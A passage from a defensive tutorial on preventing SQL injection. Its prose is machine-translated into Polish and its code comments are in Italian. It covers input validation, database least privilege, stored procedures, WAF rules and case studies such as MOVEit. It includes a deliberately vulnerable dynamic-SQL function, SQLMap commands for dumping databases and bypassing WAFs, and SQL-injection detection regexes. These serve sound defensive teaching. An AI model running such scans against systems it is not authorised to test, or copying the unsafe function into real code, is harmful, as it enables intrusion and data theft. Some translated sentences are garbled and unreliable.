        if not re.search(r'[A-Z]', v):
            raise ValueError('La password deve contenere almeno una maiuscola')
        if not re.search(r'[a-z]', v):
            raise ValueError('La password deve contenere almeno una minuscola')
        if not re.search(r'\d', v):
            raise ValueError('La password deve contenere almeno un numero')
        if not re.search(r'[@$!%*?&]', v):
            raise ValueError('La password deve contenere almeno un carattere speciale')
        return v

    model_config = {
        "str_strip_whitespace": True,  # Rimuove spazi iniziali/finali
        "str_max_length": 500,         # Limite globale lunghezza stringhe
    }

class PaginationParams(BaseModel):
    page: int = Field(default=1, ge=1, le=10000)
    limit: int = Field(default=20, ge=1, le=100)
    sort_by: Literal['created_at', 'username', 'email'] = 'created_at'
    sort_order: Literal['asc', 'desc'] = 'desc'

# FastAPI endpoint con validazione automatica
from fastapi import FastAPI, HTTPException
app = FastAPI()

@app.post("/api/users", status_code=201)
async def create_user(user_data: CreateUserRequest):
    # Pydantic ha già validato tutti i campi
    # user_data e un oggetto tipizzato, non un dict generico
    user = await user_service.create(
        username=user_data.username,
        email=user_data.email,
        password=user_data.password,
        role=user_data.role.value
    )
    return {"id": user.id}

@app.get("/api/products")
async def list_products(pagination: PaginationParams):
    return await product_service.list(
        page=pagination.page,
        limit=pagination.limit,
        sort_by=pagination.sort_by,
        sort_order=pagination.sort_order
    )

Hartowanie baz danych i zasada najmniejszych uprawnień

Nawet w przypadku doskonale sparametryzowanych zapytań źle skonfigurowana baza danych znacznie zwiększa szkody wynikające z udanego ataku. The zasada najmniejszych przywilejów zapewnia, że każdy komponent ma tylko uprawnienia niezbędne do jego działania.

-- Database Hardening: PostgreSQL come esempio

-- 1. Crea utenti dedicati per ogni ruolo applicativo
-- MAI usare l'utente postgres/root per l'applicazione!

-- Utente per l'applicazione web (solo DML)
CREATE USER app_web WITH PASSWORD 'strong_random_password_here';
GRANT CONNECT ON DATABASE myapp TO app_web;
GRANT USAGE ON SCHEMA public TO app_web;
GRANT SELECT, INSERT, UPDATE, DELETE ON ALL TABLES IN SCHEMA public TO app_web;
GRANT USAGE, SELECT ON ALL SEQUENCES IN SCHEMA public TO app_web;
-- NO: CREATE TABLE, DROP TABLE, TRUNCATE, ALTER, DDL

-- Utente per reports/analytics (solo SELECT)
CREATE USER app_reports WITH PASSWORD 'another_strong_password';
GRANT CONNECT ON DATABASE myapp TO app_reports;
GRANT USAGE ON SCHEMA public TO app_reports;
GRANT SELECT ON ALL TABLES IN SCHEMA public TO app_reports;
-- NO: INSERT, UPDATE, DELETE, DDL

-- Utente per migrazioni (solo DDL, non in produzione normale)
CREATE USER app_migrations WITH PASSWORD 'migration_password';
GRANT ALL PRIVILEGES ON DATABASE myapp TO app_migrations;
-- Questo utente viene usato SOLO durante le migrazioni, poi disabilitato:
-- ALTER USER app_migrations VALID UNTIL '2025-12-31';

-- 2. Revoca i permessi di default
REVOKE ALL ON SCHEMA public FROM PUBLIC;
REVOKE CREATE ON SCHEMA public FROM PUBLIC;

-- 3. Proteggi tabelle sensibili
-- Crea una view mascherata per dati sensibili
CREATE VIEW users_public AS
  SELECT id, username, email, role, created_at
  FROM users;
  -- Esclude: password_hash, reset_token, 2fa_secret

-- Revoca accesso diretto alla tabella users per app_reports
REVOKE SELECT ON users FROM app_reports;
-- Concedi accesso solo alla view
GRANT SELECT ON users_public TO app_reports;

-- 4. Abilita Row Level Security (RLS) per isolamento multi-tenant
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;

CREATE POLICY documents_tenant_isolation ON documents
  USING (tenant_id = current_setting('app.current_tenant_id')::integer);

-- In PostgreSQL, imposta il tenant prima delle query:
-- SET app.current_tenant_id = '123';

-- 5. Disabilita funzioni pericolose
REVOKE EXECUTE ON FUNCTION pg_read_file(text) FROM PUBLIC;
REVOKE EXECUTE ON FUNCTION pg_ls_dir(text) FROM PUBLIC;
-- Su MySQL/MariaDB:
-- REVOKE FILE ON *.* FROM 'app_web'@'%';

-- 6. Audit log per query sospette (PostgreSQL)
-- Installa pgaudit e configura in postgresql.conf:
-- shared_preload_libraries = 'pgaudit'
-- pgaudit.log = 'all'
-- pgaudit.log_relation = on

Bezpieczne procedury składowane

Procedury składowane, jeśli są prawidłowo stosowane, dodają dodatkową warstwę ochrony: hermetyzują logikę SQL w bazie danych i ograniczają interfejs dostępny dla aplikacji. Mogą jednak być podatne na ataki, jeśli wewnętrznie budują dynamiczny SQL.

-- Stored Procedure SICURA in PostgreSQL
-- Le SP fisse (non dynamic SQL) sono immuni a SQL injection

CREATE OR REPLACE FUNCTION authenticate_user(
  p_username VARCHAR(50),
  p_password_hash VARCHAR(255)
)
RETURNS TABLE(user_id INT, role VARCHAR(20))
LANGUAGE plpgsql
SECURITY DEFINER  -- Esegue con i permessi del definer (DBA), non del chiamante
AS $
BEGIN
  -- Query statica con parametri: impossibile iniettare SQL
  RETURN QUERY
    SELECT u.id, u.role
    FROM users u
    WHERE u.username = p_username
      AND u.password_hash = p_password_hash
      AND u.is_active = TRUE;

  -- Log del tentativo (senza esporre la password)
  INSERT INTO auth_audit_log (username, attempt_time, success)
  VALUES (p_username, NOW(), FOUND);
END;
$;

-- Concedi EXECUTE solo all'utente applicativo
GRANT EXECUTE ON FUNCTION authenticate_user TO app_web;
-- Revoca accesso diretto alla tabella users!
REVOKE SELECT ON users FROM app_web;

-- VULNERABILE: stored procedure con SQL dinamico
CREATE OR REPLACE FUNCTION search_products_UNSAFE(p_search TEXT)
RETURNS SETOF products
LANGUAGE plpgsql AS $
DECLARE
  v_query TEXT;
BEGIN
  -- MAI costruire SQL dinamico con input utente!
  v_query := 'SELECT * FROM products WHERE name LIKE ''%' || p_search || '%''';
  RETURN QUERY EXECUTE v_query;  -- Vulnerabile!
END;
$;

-- SICURO: stored procedure con SQL dinamico e parametri
CREATE OR REPLACE FUNCTION search_products_safe(p_search TEXT)
RETURNS SETOF products
LANGUAGE plpgsql AS $
BEGIN
  -- EXECUTE ... USING passa i parametri in modo sicuro
  RETURN QUERY EXECUTE
    'SELECT * FROM products WHERE name LIKE $1'
    USING '%' || p_search || '%';  -- Parametro sicuro
END;
$;

SQLMap: przetestuj swoją aplikację przed atakującymi

Mapa SQL i najczęściej używane narzędzie typu open source do automatycznego testowania wstrzykiwania SQL. Obsługuje MySQL, PostgreSQL, Microsoft SQL Server, Oracle i wiele innych systemów DBMS. Użyj tego tylko w systemach, które posiadasz lub z wyraźną pisemną autoryzacją.

# SQLMap: comandi essenziali per penetration testing

# Test base su un URL con parametro GET
sqlmap -u "https://localhost:3000/api/products?id=1" --batch

# Test con autenticazione (cookie di sessione)
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --cookie="session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." \
  --batch

# Test su richiesta POST con body JSON
sqlmap -u "https://localhost:3000/api/login" \
  --data='{"username":"test","password":"test"}' \
  --content-type="application/json" \
  --batch

# Test più aggressivo: tutte le tecniche di injection
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --level=5 \          # Livello di test (1-5)
  --risk=3 \           # Rischio di danni (1-3, usa 2 in test)
  --technique=BEUST \  # Tutte le tecniche: Boolean, Error, Union, Stacked, Time
  --batch

# Dump dello schema (solo se vulnerabile, a scopo dimostrativo)
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --dbs \          # Lista dei database
  --tables \       # Lista delle tabelle
  --dump-all \     # Dump completo (USARE CON CAUTELA)
  --batch

# Test con tamper script per bypass WAF
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --tamper=space2comment,between,randomcase \
  --batch

# Genera report HTML
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --batch \
  --output-dir=/tmp/sqlmap-report

# Test su file di richiesta HTTP (catturata con Burp Suite)
# Salva la richiesta in request.txt:
# GET /api/products?id=1 HTTP/1.1
# Host: localhost:3000
# Cookie: session=...
sqlmap -r request.txt --batch

Zintegruj SQLMap z CI/CD

Aby zautomatyzować testowanie, zintegruj SQLMap z potokiem przejściowym. Przykład z akcjami GitHub:

# .github/workflows/security-test.yml
name: Security Tests - SQL Injection

on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]

jobs:
  sqlmap-scan:
    runs-on: ubuntu-latest
    services:
      app:
        image: myapp:${{ github.sha }}
        ports:
          - 3000:3000
        env:
          DATABASE_URL: postgresql://test:test@postgres/testdb

      postgres:
        image: postgres:15
        env:
          POSTGRES_PASSWORD: test
          POSTGRES_USER: test
          POSTGRES_DB: testdb

    steps:
      - uses: actions/checkout@v4

      - name: Install SQLMap
        run: pip install sqlmap

      - name: Wait for app to be ready
        run: |
          timeout 30 bash -c 'until curl -s http://localhost:3000/health; do sleep 1; done'

      - name: Run SQLMap against API endpoints
        run: |
          sqlmap \
            -u "http://localhost:3000/api/products?id=1" \
            --batch \
            --level=3 \
            --risk=1 \
            --output-dir=./sqlmap-results \
            --format=json \
            --no-logging

      - name: Check for vulnerabilities
        run: |
          # Fallisce la build se SQLMap trova vulnerabilità
          if grep -q '"vulnerable": true' ./sqlmap-results/*.json 2>/dev/null; then
            echo "CRITICAL: SQL Injection vulnerability found!"
            cat ./sqlmap-results/*.json
            exit 1
          fi

      - name: Upload results
        uses: actions/upload-artifact@v4
        if: always()
        with:
          name: sqlmap-report
          path: ./sqlmap-results/

Ochrona WAF i środowiska wykonawczego

Un Zapora aplikacji sieci Web (WAF) dodaje warstwę obrony przed aplikacją, analizując żądania HTTP w celu wykrycia znanych wzorców ataków. Nie zastępuje bezpiecznego kodu, ale zmniejsza ryzyko ataków typu zero-day i zautomatyzowanych.

# Configurazione WAF con ModSecurity (Apache/Nginx) + OWASP CRS

# nginx.conf - Abilita ModSecurity
server {
    listen 443 ssl;
    server_name api.example.com;

    # Abilita ModSecurity
    modsecurity on;
    modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf;

    # OWASP Core Rule Set
    include /etc/nginx/modsecurity/crs/crs-setup.conf;
    include /etc/nginx/modsecurity/crs/rules/*.conf;

    location / {
        proxy_pass http://localhost:3000;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

# modsecurity.conf - Configurazione base
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Regola custom per proteggere endpoint critico
SecRule ARGS "@rx (union|select|insert|delete|update|drop|create)" \
    "id:1001,\
    phase:2,\
    block,\
    capture,\
    t:lowercase,\
    log,\
    msg:'Possible SQL Injection',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'attack-sqli',\
    severity:'CRITICAL'"

# Rate limiting per prevenire brute force e scanning
limit_req_zone $binary_remote_addr zone=api:10m rate=100r/m;
limit_req_zone $binary_remote_addr zone=login:10m rate=10r/m;

server {
    location /api/ {
        limit_req zone=api burst=20 nodelay;
        limit_req_status 429;
    }

    location /api/auth/login {
        limit_req zone=login burst=5 nodelay;
        limit_req_status 429;
    }
}

// Runtime protection in Node.js con Helmet e express-rate-limit
import express from 'express';
import helmet from 'helmet';
import rateLimit from 'express-rate-limit';
import { sqlInjectionGuard } from './middleware/sql-injection-guard';

const app = express();

// 1. Helmet: header di sicurezza HTTP
app.use(helmet({
  contentSecurityPolicy: {
    directives: {
      defaultSrc: ["'self'"],
      scriptSrc: ["'self'"],
      styleSrc: ["'self'", "'unsafe-inline'"],
    },
  },
  referrerPolicy: { policy: 'strict-origin-when-cross-origin' },
}));

// 2. Rate limiting globale
const globalLimiter = rateLimit({
  windowMs: 15 * 60 * 1000,  // 15 minuti
  max: 1000,                  // Massimo 1000 richieste per IP
  standardHeaders: true,
  legacyHeaders: false,
  message: { error: 'Troppe richieste, riprova tra 15 minuti' },
});

const authLimiter = rateLimit({
  windowMs: 15 * 60 * 1000,
  max: 10,  // Solo 10 tentativi di login per 15 minuti
  skipSuccessfulRequests: true,
  message: { error: 'Troppi tentativi di accesso, account temporaneamente bloccato' },
});

app.use('/api/', globalLimiter);
app.use('/api/auth/', authLimiter);

// 3. Middleware custom per rilevare pattern SQL injection
function sqlInjectionGuard(req, res, next) {
  const suspiciousPatterns = [
    /(\bUNION\b.*\bSELECT\b)/i,
    /(\bSELECT\b.*\bFROM\b)/i,
    /('.*\bOR\b.*'.*=.*')/i,
    /(\bDROP\b.*\bTABLE\b)/i,
    /--\s*$/m,
    /;\s*$/,
    /\/\*.*\*\//,
    /\bEXEC\b.*\(/i,
    /\bCAST\b.*\bAS\b/i,
  ];

  const checkValue = (value) => {
    if (typeof value === 'string') {
      return suspiciousPatterns.some(pattern => pattern.test(value));
    }
    if (typeof value === 'object' && value !== null) {
      return Object.values(value).some(checkValue);
    }
    return false;
  };

  const sources = [req.body, req.query, req.params];
  const isSuspicious = sources.some(checkValue);

  if (isSuspicious) {
    // Log dettagliato per il team di sicurezza
    console.warn('Possible SQL injection attempt:', {
      ip: req.ip,
      method: req.method,
      url: req.url,
      timestamp: new Date().toISOString(),
    });
    // Risposta generica per non rivelare informazioni
    return res.status(400).json({ error: 'Richiesta non valida' });
  }

  next();
}

app.use('/api/', sqlInjectionGuard);

Studium przypadku: Prawdziwe ataki 2023-2025

Transfer MOVEit (CVE-2023-34362) — Naruszenie roku

W maju 2023 krytyczny zastrzyk SQL w oprogramowaniu do przesyłania plików Przeniesienie MOVEita przez Progress Software spowodował jedno z najpoważniejszych naruszeń danych w najnowszej historii. Luka (CVE-2023-34362, CVSS 9.8) umożliwiała atakującym wstrzykiwanie kodu SQL poprzez parametry HTTP, ominięcie uwierzytelniania i wykonanie dowolnych poleceń na serwerze.

Efekt był druzgocący: 11,3 miliona danych pacjentów skradzione Maximusowi, naruszenia przepisów Departamentu Energii Stanów Zjednoczonych, Biura Pojazdów Silnikowych Luizjany i setek innych organizacji. Grupa ransomware Cl0p wykorzystała tę lukę do wyłudzenia pieniędzy od ponad 2000 organizacji na całym świecie. Pozwy zbiorowe trwały do 2024 r.

Luka dotyczyła unieważnionego parametru HTTP, który został połączony bezpośrednio z zapytaniem SQL w celu sprawdzenia sesji. Pojedyncza linijka niezabezpieczonego kodu wygenerowała szkody o wartości miliardów dolarów.

TSA FlyCASS (2024) – Luki w infrastrukturze krytycznej

W 2024 roku badacze bezpieczeństwa Ian Carroll i Sam Curry odkryli w systemie zastrzyk SQL FlyCASS, używany przez amerykańską TSA (Administrację Bezpieczeństwa Transportu) do sprawdzania członków załóg linii lotniczych. Luka mogła umożliwić osobie atakującej dodanie dowolnych nazwisk do bazy danych upoważnionego personelu, potencjalnie omijając kontrole bezpieczeństwa na lotnisku.

Wznów kampanię Looters (2024)

Grupa Wznów Looters naraził na szwank ponad 65 witryn rekrutacyjnych i detalicznych za pomocą wstrzykiwania SQL i ataków XSS. Ukradli miliony danych kandydatów, w tym dane osobowe, życiorysy i dane kontaktowe. Ten przypadek pokazuje, jak w 2024 roku wstrzykiwanie SQL będzie nadal z powodzeniem stosowane w aplikacjach produkcyjnych.

Wnioski ze studiów przypadku

We wszystkich tych przypadkach lukę można było łatwo naprawić z technicznego punktu widzenia: wystarczyła przygotowana instrukcja zamiast łączenia ciągów znaków. Prawdziwym kosztem nie jest naprawienie błędu, ale wynikające z tego szkody reputacyjne, prawne i finansowe. Bezpieczeństwo powinno być wbudowane w trakcie programowania, a nie dodawane po naruszeniu.

Specyficzna dla Angular lista kontrolna dotycząca bezpieczeństwa zaplecza

Jeśli programujesz w Angular i masz backend Node.js/NestJS, oto konkretne elementy sterujące do zintegrowania:

// NestJS - Configurazione sicura con TypeORM

// 1. Usa TypeORM Repository API, evita query builder con interpolazione
@Injectable()
export class UserRepository {
  constructor(
    @InjectRepository(User)
    private readonly repository: Repository<User>,
  ) {}

  // SICURO: find() con TypeORM genera query parametrizzate
  async findByEmail(email: string): Promise<User | null> {
    return this.repository.findOne({ where: { email } });
  }

  // SICURO: QueryBuilder con parametri nominati
  async searchUsers(search: string, role: UserRole): Promise<User[]> {
    return this.repository
      .createQueryBuilder('user')
      .where('user.username LIKE :search AND user.role = :role', {
        search: `%${search}%`,
        role,
      })
      .select(['user.id', 'user.username', 'user.email'])
      .take(50)
      .getMany();
  }
}

// 2. ValidationPipe globale con class-validator
import { ValidationPipe } from '@nestjs/common';

// main.ts
async function bootstrap() {
  const app = await NestFactory.create(AppModule);

  // Abilita validazione globale con whitelist
  app.useGlobalPipes(new ValidationPipe({
    whitelist: true,       // Rimuove proprietà non dichiarate nel DTO
    forbidNonWhitelisted: true,  // Errore se ci sono proprietà extra
    transform: true,       // Trasforma automaticamente i tipi
    transformOptions: {
      enableImplicitConversion: true,
    },
  }));

  await app.listen(3000);
}

// 3. DTO con class-validator
import { IsString, IsEmail, MinLength, MaxLength, Matches } from 'class-validator';
import { Transform } from 'class-transformer';

export class CreateUserDto {
  @IsString()
  @MinLength(3)
  @MaxLength(50)
  @Matches(/^[a-zA-Z0-9_-]+$/, {
    message: 'Username deve contenere solo lettere, numeri, underscore e trattino',
  })
  @Transform(({ value }) => value?.trim().toLowerCase())
  username: string;

  @IsEmail()
  @Transform(({ value }) => value?.trim().toLowerCase())
  email: string;

  @IsString()
  @MinLength(8)
  @MaxLength(128)
  @Matches(
    /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&])[A-Za-z\d@$!%*?&]/,
    { message: 'Password troppo debole' }
  )
  password: string;
}

Najlepsze praktyki: podsumowanie

Praktyka	Priorytet	Uderzenie
Zapytania parametryczne / Przygotowane zestawienia	KRYTYKA	Zapobiega klasycznemu i drugiemu zastrzykowi SQL
Walidacja danych wejściowych za pomocą schematu (Zod/Pydantic)	WYSOKI	Odrzuć zniekształcone dane wejściowe, zanim dotrą do bazy danych
Standardowe API ORM (unika surowych zapytań)	WYSOKI	Zmniejsza ryzyko wstrzyknięcia ORM
Zasada DB najmniejszych uprawnień	WYSOKI	Ogranicza obrażenia, jeśli atak się powiedzie
Odkażanie NoSQL (express-mongo-sanitize)	WYSOKI	Zapobiega wstrzykiwaniu operatora NoSQL
Procedury składowane (opcjonalnie)	PRZECIĘTNY	Hermetyzuje logikę SQL, zmniejsza powierzchnię ataku
WAF (ModSecurity + OWASP CRS)	PRZECIĘTNY	Blokuje znane ataki, zanim dotrą do aplikacji
Ograniczanie szybkości w krytycznych punktach końcowych	PRZECIĘTNY	Zapobiega brutalnej sile i automatycznemu skanowaniu
SQLMap na CI/CD	PRZECIĘTNY	Automatycznie wykrywaj regresje bezpieczeństwa
Ogólna obsługa błędów (bez śledzenia stosu)	PRZECIĘTNY	Nie ujawnia atakującym przydatnych informacji
Dzienniki audytu bazy danych	NISKI	Umożliwia analizę kryminalistyczną w przypadku naruszenia

Typowe anty-wzorce

Częste błędy, których należy unikać

Łączenie ciągów w zapytaniach: Nawet pojedyncze wystąpienie może zagrozić całej aplikacji.
Zaufaj danym pochodzącym z bazy danych: Dane pochodzące z Twojej bazy danych mogą zawierać wcześniej wstrzyknięte ładunki (wstrzyknięcie drugiego rzędu).
Użyj użytkownika root bazy danych dla aplikacji: W przypadku naruszenia atakujący będzie miał pełny dostęp do serwera.
Pokaż szczegółowe błędy bazy danych w produkcji: Komunikaty o błędach ujawniają strukturę bazy danych, wersję i inne dane przydatne atakującemu.
Wierząc, że ORM rozwiązuje wszystko: Surowe metody zapytań ORM ($queryRawUnsafe, query() z interpolacją) są równie podatne.
Zapomnij o sprawdzaniu typu: Pole, które powinno być liczbą całkowitą, ale akceptuje obiekty JSON i jest podatne na wstrzyknięcie NoSQL.
Nie testuj bezpieczeństwa w CI/CD: SQLMap i inne narzędzia można zintegrować z potokiem w celu wykrywania regresji.

Wnioski i dalsze kroki

Wstrzykiwanie SQL pozostaje jednym z najbardziej konkretnych i wpływowych zagrożeń dla aplikacji internetowych w 2025 r. Dobra wiadomość jest taka, że środki zaradcze są dobrze zdefiniowane i stosunkowo proste do wdrożenia: zapytania parametryczne, walidacja danych wejściowych e zasada najmniejszych przywilejów tworzą skuteczną triadę obronną przeciwko zdecydowanej większości ataków.

Przypadki MOVEit, FlyCASS i ResumeLooters pokazują, że problemem nie jest techniczna złożoność luk, ale brak dyscyplin bezpieczeństwa zintegrowanych z procesem rozwoju. Dzięki wzorcom przedstawionym w tym artykule możesz systematycznie eliminować tę klasę luk ze swojego kodu.

Kolejny artykuł z serii dotyczybezpieczne uwierzytelnianie za pomocą sesji i plików cookie: Kolejny kluczowy filar bezpieczeństwa zaplecza. Jeśli masz pytania lub chcesz dowiedzieć się więcej na temat konkretnego przypadku, napisz w komentarzach.

Powiązane artykuły z serii Bezpieczeństwo sieciowe

OWASP Top 10 2025: Przewodnik dla programistów - Ogólny kontekst luk w zabezpieczeniach sieciowych
XSS, CSRF i CSP: Bezpieczeństwo frontonu - Frontendowy odpowiednik bezpieczeństwa
Bezpieczne uwierzytelnianie: sesja i pliki cookie - Następny w serii
Bezpieczeństwo API: OAuth 2.1, JWT i ograniczanie szybkości - Bezpieczeństwo API REST